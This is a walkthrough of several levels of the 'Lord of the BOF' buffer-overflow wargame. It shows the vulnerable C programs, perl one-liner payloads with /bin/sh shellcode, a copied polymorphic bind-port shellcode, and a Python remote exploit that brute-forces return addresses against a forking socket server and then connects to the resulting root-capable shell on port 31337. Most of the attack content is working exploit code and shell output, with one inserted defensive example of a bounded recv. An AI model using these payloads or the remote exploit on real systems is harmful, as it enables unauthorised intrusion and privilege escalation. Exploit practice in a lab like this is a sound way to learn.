[zombie_assassin@localhost zombie_assassin]$ ./succubus "`perl -e '{print "A"x44,"\xec\x87\x04\x08","\xbc\x87\x04\x08","\x8c\x87\x04\x08","\x5c\x87\x04\x08","\x24\x87\x04\x08","\xb8\xfa\xff\xbf"x2,"/bin/sh"}'`"

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA耳??눡?옇??bin/sh

welcome to the DO!

welcome to the GYE!

welcome to the GUL!

welcome to the YUT!

welcome to the MO!

bash$ whoami

succubus

bash$ id

uid=516(zombie_assassin) gid=516(zombie_assassin) euid=517(succubus) egid=517(succubus) groups=516(zombie_assassin)

bash$ /bin/my-pass

euid = 517

here to stay

bash$

bash$


===========================================================================

[succubus@localhost succubus]$ cat nightmare.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - nightmare
        - PLT
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <dumpcode.h>

main(int argc, char *argv[])
{
        char buffer[40];
        char *addr;

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        // check address
        addr = (char *)&strcpy;
        if(memcmp(argv[1]+44, &addr, 4) != 0){
                printf("You must fall in love with strcpy()\n");
                exit(0);
        }

        // overflow!
        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);

        // dangerous waterfall
        memset(buffer+40+8, 'A', 4);
}
[succubus@localhost succubus]$




So I overwrite the stack with strcpy?..

1. The easy way is to put the shellcode in the second argument, change AAAA to that address and jump there...is there another way?..

  [Ax40][SFP][RET(strcpy)][AAAA][dest(AAAA address)][src(argv[2] address)] [shellcode]

"`perl -e '{print "A"x44, "\x10\x84\x04\x08","BBBB","\x90\xfa\xff\xbf","\x24\xfc\xff\xbf"}'`" "`perl -e '{print "\x2e\xfc\xff\xbf"}'`" "`perl -e '{print "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"}'`"

"`perl -e '{print "A"x44, "\x10\x84\x04\x08","BBBB","\x90\xfa\xff\xbf","\x29\xfc\xff\xbf"}'`" "`perl -e '{print "\x2e\xfc\xff\xbf"}'`" "`perl -e '{print "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"}'`"


2. Turn AAAA into a pop-pop-ret

[pop-pop ret][systemaddr][SFP][/bin/sh][Ax24][SFP][RET(strcpy)][AAAA][dest(AAAA address)][src(pop-pop ret addr)]

It gets overwritten by strcpy.


$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>

0x8048722 <main+110>:   call   0x8048410 <strcpy>


0xbffffb08:     0x4000ae60      0x43434343      0x41414141      0x44444444
0xbffffb18:     0x45454545      0x40013800      0x00000002      0x08048420
0xbffffb28:     0x00000000      0x08048441      0x080486b4      0x00000002

0xbffffae0:     0x400cc103      0x40058ae0      0x42424242      0x401001c7


"`perl -e '{print "\x03\xc1\x0c\x40", "\xe0\x8a\x05\x40","BBBB","\xc7\x01\x10\x40", "A"x24,"CCCC","\x10\x84\x04\x08","\x0c\xfb\xff\xbf","\xe0\xfa\xff\xbf"}'`"


pop-pop-ret : 0x400cc103


Hmm...the buffer doesn't end, so it keeps getting overwritten..this won't work;;



[succubus@localhost succubus]$ ./nightmare "`perl -e '{print "A"x44, "\x10\x84\x04\x08","BBBB","\x90\xfa\xff\xbf","\x29\xfc\xff\xbf"}'`" "`perl -e '{print "\x2e\xfc\xff\xbf"}'`" "`perl -e '{print "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"}'`"

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

                                           BBBB멁???

                                                        bash$

bash$ whoami

nightmare

bash$ id

uid=517(succubus) gid=517(succubus) euid=518(nightmare) egid=518(nightmare) groups=517(succubus)

bash$ /bin/my-pass

euid = 518

beg for me

bash$



============================================================================================

[nightmare@localhost nightmare]$ cat xavius.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - xavius
        - arg
*/

#include <stdio.h>
#include <stdlib.h>
#include <dumpcode.h>

main()
{
        char buffer[40];
        char *ret_addr;

        // overflow!
        fgets(buffer, 256, stdin);
        printf("%s\n", buffer);

        if(*(buffer+47) == '\xbf')
        {
                printf("stack retbayed you!\n");
                exit(0);
        }

        if(*(buffer+47) == '\x08')
        {
                printf("binary image retbayed you, too!!\n");
                exit(0);
        }

        // check if the ret_addr is library function or not
        memcpy(&ret_addr, buffer+44, 4);
        while(memcmp(ret_addr, "\x90\x90", 2) != 0)     // end point of function
        {
                if(*ret_addr == '\xc9'){                // leave
                        if(*(ret_addr+1) == '\xc3'){    // ret
                                printf("You cannot use library function!\n");
                                exit(0);
                        }
                }
                ret_addr++;
        }

        // stack destroyer
        memset(buffer, 0, 44);
        memset(buffer+48, 0, 0xbfffffff - (int)(buffer+48));

        // LD_* eraser
        // 40 : extra space for memset function
        memset(buffer-3000, 0, 3000-40);
}
[nightmare@localhost nightmare]$


The stack gets wiped..can't do RTL either...ROP?...not that either..

Should I put it in the printf buffer and jump there?



// 25-byte shellcode

`perl -e 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`


"`perl -e '{print "\x90"x15,"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80","BBBB","\x06\x60\x01\x40"}'`"



[nightmare@localhost nightmare]$ (perl -e '{print "\x90"x15,"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80","BBBB","\x06\x60\x01\x40"}';cat)|./xavius    

ls

릱릱릱릱릱릱릱?픐h//shh/bin됥PS됣1柰

                                     ?BBBB`@ls



d

/bin//sh: d: command not found

id

uid=518(nightmare) gid=518(nightmare) euid=519(xavius) egid=519(xavius) groups=518(nightmare)

whoami

xavius

/bin/my-pass 

euid = 519

throw me away




=========================================================================================================

[xavius@localhost xavius]$ cat death_knight.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - dark knight
        - remote BOF
*/

#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <dumpcode.h>

main()
{
        char buffer[40];

        int server_fd, client_fd;
        struct sockaddr_in server_addr;
        struct sockaddr_in client_addr;
        int sin_size;

        if((server_fd = socket(AF_INET, SOCK_STREAM, 0)) == -1){
                perror("socket");
                exit(1);
        }

        server_addr.sin_family = AF_INET;
        server_addr.sin_port = htons(6666);
        server_addr.sin_addr.s_addr = INADDR_ANY;
        bzero(&(server_addr.sin_zero), 8);

        if(bind(server_fd, (struct sockaddr *)&server_addr, sizeof(struct sockaddr)) == -1){
                perror("bind");
                exit(1);
        }

        if(listen(server_fd, 10) == -1){
                perror("listen");
                exit(1);
        }

        while(1) {
                sin_size = sizeof(struct sockaddr_in);
                if((client_fd = accept(server_fd, (struct sockaddr *)&client_addr, &sin_size)) == -1){
                        perror("accept");
                        continue;
                }

                if (!fork()){
                        send(client_fd, "Death Knight : Not even death can save you from me!\n", 52, 0);
                        send(client_fd, "You : ", 6, 0);
                        recv(client_fd, buffer, 256, 0);        // up to 256 bytes into a 40-byte buffer
                        close(client_fd);
                        break;
                }

                close(client_fd);
                while(waitpid(-1,NULL,WNOHANG) > 0);
        }
        close(server_fd);
}


It's a remote exploit+_+.

For now there's no real filtering, and since the buffer overflows it looks exploitable.
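death_knight.c passes 256 to recv() while buffer holds 40 bytes, so every byte past the 40th lands on the saved frame of the forked child. The following is an added example, not the challenge's or the author's code: the challenge's recv call replayed over a socketpair into a scratch area so the overrun is counted rather than executed, beside a read bounded by the destination size that NUL-terminates and drains the surplus. client_sending, overrun_with_challenge_bound, recv_bounded, kept_with_bounded_recv and the 200-byte constructed message are assumptions for illustration.

```c
#define _DEFAULT_SOURCE 1
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>

#define BUF_SIZE 40   /* char buffer[40] in death_knight.c */

/* Stand-in for the client: writes msg_len 'A' bytes (constructed input) into
 * one end of a socketpair, closes it, and returns the server end (-1 on error). */
static int client_sending(size_t msg_len)
{
    int sv[2];
    char *msg = malloc(msg_len);
    if (!msg || socketpair(AF_UNIX, SOCK_STREAM, 0, sv) < 0) {
        free(msg);
        return -1;
    }
    memset(msg, 'A', msg_len);
    if (write(sv[1], msg, msg_len) != (ssize_t)msg_len) {
        close(sv[0]);
        close(sv[1]);
        free(msg);
        return -1;
    }
    close(sv[1]);
    free(msg);
    return sv[0];
}

/* The challenge's read, recv(client_fd, buffer, 256, 0) into a 40-byte buffer,
 * replayed into a 256-byte scratch area so the overrun is measured instead of
 * executed. Returns how many received bytes would land past the 40-byte buffer. */
int overrun_with_challenge_bound(size_t msg_len)
{
    char scratch[256];
    ssize_t n;
    int fd = client_sending(msg_len);
    if (fd < 0) return -1;
    n = recv(fd, scratch, 256, 0);
    close(fd);
    if (n < 0) return -1;
    return n > BUF_SIZE ? (int)(n - BUF_SIZE) : 0;
}

/* Hardened read: the bound comes from the destination, the result is always
 * NUL-terminated, and any surplus is drained non-blocking so it cannot be
 * handed to a later, less careful read. Returns bytes kept, -1 on error;
 * *discarded receives the number of surplus bytes thrown away. */
int recv_bounded(int fd, char *buffer, size_t size, size_t *discarded)
{
    char sink[64];
    ssize_t n, m;
    *discarded = 0;
    n = recv(fd, buffer, size - 1, 0);
    if (n < 0) return -1;
    buffer[n] = '\0';
    while ((m = recv(fd, sink, sizeof sink, MSG_DONTWAIT)) > 0)
        *discarded += (size_t)m;
    return (int)n;
}

/* Runs recv_bounded against a msg_len-byte message with the challenge-sized
 * buffer. Returns bytes kept; *discarded gets the surplus count. */
int kept_with_bounded_recv(size_t msg_len, size_t *discarded)
{
    char buffer[BUF_SIZE];
    int fd = client_sending(msg_len);
    int kept;
    if (fd < 0) return -1;
    kept = recv_bounded(fd, buffer, sizeof buffer, discarded);
    close(fd);
    return kept;
}

int main(void)
{
    size_t dropped = 0;
    int over = overrun_with_challenge_bound(200);
    int kept = kept_with_bounded_recv(200, &dropped);
    printf("challenge bound, 200-byte message: %d bytes past the buffer\n", over);
    printf("bounded recv,    200-byte message: kept %d, discarded %zu\n", kept, dropped);
    return 0;
}
```

Because each connection is served by a forked child with the parent's stack layout, a client can reconnect and retry as often as it likes (the script further down does so 100 times); bounding the read by the destination size removes the overwrite those retries depend on.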



remote shellcode

http://www.exploit-db.com/exploits/13910/


/*
Title  : Polymorphic shellcode that bindport to 31337 with setreuid (0,0) x86 linux shellcode.
Name   : 131 bytes bind port 31337 x86 linux polymorphic shellcode.
Date   : Sat Jun  17 21:27:03 2010
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web    : http://devilzc0de.org
blog   : http://gunslingerc0de.wordpress.com
tested on : linux debian
special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org), loneferret (offensive-security.com)
greetzz to all devilzc0de, jasakom, yogyacarderlink, serverisdown, indonesianhacker and all my friend !!
*/

#include <stdio.h>
#include <string.h>   /* strlen() */

char bindport[] = "\xeb\x11\x5e\x31\xc9\xb1\x6b\x80\x6c\x0e\xff\x35\x80\xe9\x01"
          "\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\xe5\x7b\xbd\x0e\x02\xb5"
          "\x66\xf5\x66\x10\x66\x07\x85\x9f\x36\x9f\x37\xbe\x16\x33\xf8"
          "\xe5\x9b\x02\xb5\xbe\xfb\x87\x9d\xf0\x37\xaf\x9e\xbe\x16\x9f"
          "\x45\x86\x8b\xbe\x16\x33\xf8\xe5\x9b\x02\xb5\x87\x8b\xbe\x16"
          "\xe8\x39\xe5\x9b\x02\xb5\x87\x87\x8b\xbe\x16\x33\xf8\xe5\x9b"
          "\x02\xb5\xbe\xf8\x66\xfe\xe5\x74\x02\xb5\x76\xe5\x74\x02\xb5"
          "\x76\xe5\x74\x02\xb5\x87\x9d\x64\x64\xa8\x9d\x9d\x64\x97\x9e"
          "\xa3\xbe\x18\x87\x88\xbe\x16\xe5\x40\x02\xb5";

int main(void)
{
    fprintf(stdout,"Length: %d\n",(int)strlen(bindport));
    (*(void(*)()) bindport)();
}






Trying 127.0.0.1...

telnet: Unable to connect to remote host: Connection refused


Status message


READ :  Death Knight : Not even death can save you from me!

You :

READ : 

Trying 127.0.0.1...

Connected to localhost.localdomain.

Escape character is '^]'.



: command not found

ls

: command not found

ls;

bin

boot

dev

etc

home

lib

lost+found

mnt

opt

proc

root

sbin

tmp

usr

var

: command not found

id;

uid=0(root) gid=0(root) euid=520(death_knight) egid=520(death_knight)

: command not found

/bin/my-pass

: No such file or directory

/bin/my-pass;

euid = 520

got the life

: command not found

whoami;

death_knight

: command not found



[xavius@localhost xavius]$ cat exploit.py
#!/usr/bin/python
# Python 2 script (str payloads, print statement)
import socket
import os
import struct

# size = 131
shellcode = "\xeb\x11\x5e\x31\xc9\xb1\x6b\x80\x6c\x0e\xff\x35\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\xe5\x7b\xbd\x0e\x02\xb5\x66\xf5\x66\x10\x66\x07\x85\x9f\x36\x9f\x37\xbe\x16\x33\xf8\xe5\x9b\x02\xb5\xbe\xfb\x87\x9d\xf0\x37\xaf\x9e\xbe\x16\x9f\x45\x86\x8b\xbe\x16\x33\xf8\xe5\x9b\x02\xb5\x87\x8b\xbe\x16\xe8\x39\xe5\x9b\x02\xb5\x87\x87\x8b\xbe\x16\x33\xf8\xe5\x9b\x02\xb5\xbe\xf8\x66\xfe\xe5\x74\x02\xb5\x76\xe5\x74\x02\xb5\x76\xe5\x74\x02\xb5\x87\x9d\x64\x64\xa8\x9d\x9d\x64\x97\x9e\xa3\xbe\x18\x87\x88\xbe\x16\xe5\x40\x02\xb5"

# little-endian 32-bit pack (only struct is imported, so qualify the call)
p = lambda x : struct.pack("<L", x)

for i in range(0,100) :
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # 256 - 40 - 4 - 4 - 131 = ..70?..
    buffer = "A"*44
    #buffer = buffer + "\xe0\x8a\x05\x40"
    #buffer = buffer + "DDDD"
    #buffer = buffer + "BBBB"
    #buffer = buffer + "\xc7\x01\x10\x40"
    #buffer = buffer + "\x60\xfb\xff\xbf"
    buffer = buffer + struct.pack("<L",(0xbfffffff - i*70))
    buffer = buffer + "\x90"*70
    buffer = buffer + shellcode

    print "\nStatus message\r\n"

    s.connect(('127.0.0.1',6666))

    data = s.recv(1024)
    print "READ : ",data

    #print "SEND", buffer
    s.send(buffer)

    data = s.recv(1024)
    print "READ : ",data

    s.close()   # was "s.close" without parentheses, which never closed the socket

    os.system("telnet localhost 31337")

[xavius@localhost xavius]$




[death_knight@localhost death_knight]$ cat dropped_item.txt

You're so great! This is a token to the next gate.

                   ,.
                 ,'  `.
               ,' _<>_ `.
             ,'.-'____`-.`.
           ,'_.-''    ``-._`.
         ,','      /\      `.`.
       ,' /.._  O /  \ O  _.,\ `.
     ,'/ /  \ ``-;.--.:-'' /  \ \`.
   ,' : :    \  /\`.,'/\  /    : : `.
  < <>| |   O >(< (  ) >)< O   | |<> >
   `. : :    /  \/,'`.\/  \    ; ; ,'
     `.\ \  /_..-:`--';-.._\  / /,'
       `. \`'   O \  / O   `'/ ,'
         `.`._     \/     _,','
           `..``-.____.-'',,'
             `.`-.____.-','
               `.  <>  ,'
                 `.  ,'
                   `'

[death_knight@localhost death_knight]$
